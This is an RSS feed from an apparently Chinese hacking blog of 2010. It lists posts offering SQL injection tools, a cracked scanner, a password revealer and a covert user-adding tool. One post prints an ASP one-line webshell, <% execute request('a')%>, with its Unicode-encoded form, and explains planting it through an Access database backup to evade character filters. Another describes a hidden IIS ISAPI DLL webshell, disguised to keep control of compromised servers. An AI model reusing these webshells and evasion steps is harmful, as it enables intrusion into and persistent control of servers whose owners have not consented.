<![CDATA[樱花浪子'S BLOG]]> http://hacklu.net/blog/index.php zh-cn http://hacklu.net/blog/post/891/ <![CDATA[Uncovers hidden passwords on password dialog boxes]]> 樱花浪子 <> Wed, 01 Sep 2010 03:48:17 +0000 http://hacklu.net/blog/post/891/ * State of the art password recovery engine - all passwords are recovered instantly
* Multilingual passwords are supported
* Full install/uninstall support

点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/890/ <![CDATA[havij1.12注入工具]]> 樱花浪子 <> Tue, 31 Aug 2010 09:52:02 +0000 http://hacklu.net/blog/post/890/


点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/889/ <![CDATA[sqlserver注射工具支持sqlserver2008]]> 樱花浪子 <> Tue, 31 Aug 2010 09:45:06 +0000 http://hacklu.net/blog/post/889/



点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/888/ <![CDATA[WebCruiser v2.3.3]]> 樱花浪子 <> Mon, 30 Aug 2010 05:21:58 +0000 http://hacklu.net/blog/post/888/
破解版下载:

点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入

使用说明说下载:
这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/886/ <![CDATA[unicode编码的access木马]]> 樱花浪子 <> Sun, 29 Aug 2010 15:02:25 +0000 http://hacklu.net/blog/post/886/
┼攠數畣整爠煥敵瑳∨≡┩>

然后将mdb备份成asp或者asa。

访问这个asp或asa,就是一句话。

注:上面那串乱码,是<% execute request("a")%>的unicode

因为你直接插入< % execute request("a")%>,那么编码后没法执行。

有些地方过滤了%号或引号,用unicode编码的access木马就可以绕过了。

ansi2unicode工具下载:

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/884/ <![CDATA[iis_black(一个特别的Webshell)]]> 樱花浪子 <> Sat, 28 Aug 2010 16:07:09 +0000 http://hacklu.net/blog/post/884/ 论坛上很多人在讨论如何保护自己的webshell 权限 不被发现。
我共享一个我自己用的东西吧。

下载DLL动态库,然后安装到IIS6里.【文件名、文件存放位置、扩展名 随你自己喜欢改了。怎么迷惑别人的眼睛就怎么改。】
点击在新窗口中浏览此图片

然后就通过ie访问:
http://www.xxx.com/ji4ozhu.[你的扩展名]        这个文件并不存在..
一定程度来说 保住肉鸡很好的一个手段。

点击在新窗口中浏览此图片

其他问题:
这个页面是用C写的自定义的代码。不是asp\php 语言。不要担心和别的网页程序有冲突。


IIS5  IIS7 未测试。方便的朋友测试下。
最好把DLL 放在 php目录 或者 C:\WINDOWS\system32\inetsrv\  这样的目录下。。
IIS有权限加载ISAPI 的目录。

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/878/ <![CDATA[注入语句笔记]]> 樱花浪子 <> Wed, 25 Aug 2010 03:12:16 +0000 http://hacklu.net/blog/post/878/ 一个查询常用注入命令的小工具

点击在新窗口中浏览此图片


这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/877/ <![CDATA[二级域名查询器]]> 樱花浪子 <> Wed, 25 Aug 2010 03:10:36 +0000 http://hacklu.net/blog/post/877/
v1.0版本,调用alexa.chinaz.com但看来google可能比较强大点,下一版本添加。

程序作者:小翔 qq:332876777

点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/876/ <![CDATA[T00ls旁注扫描源码(易语言)]]> 樱花浪子 <> Wed, 25 Aug 2010 03:09:04 +0000 http://hacklu.net/blog/post/876/

点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入 ]]> http://hacklu.net/blog/post/879/ <![CDATA[无net,net1加用户(内附源码)]]> 樱花浪子 <> Wed, 25 Aug 2010 02:47:02 +0000 http://hacklu.net/blog/post/879/ 作者:ASM(t00ls)blog:http://hi.baidu.com/sbasm

使用命令格式:mynet.exe username password LocalGroup

内附源码


点击在新窗口中浏览此图片

这个文件只能在登入之后下载。请先 注册登入


]]>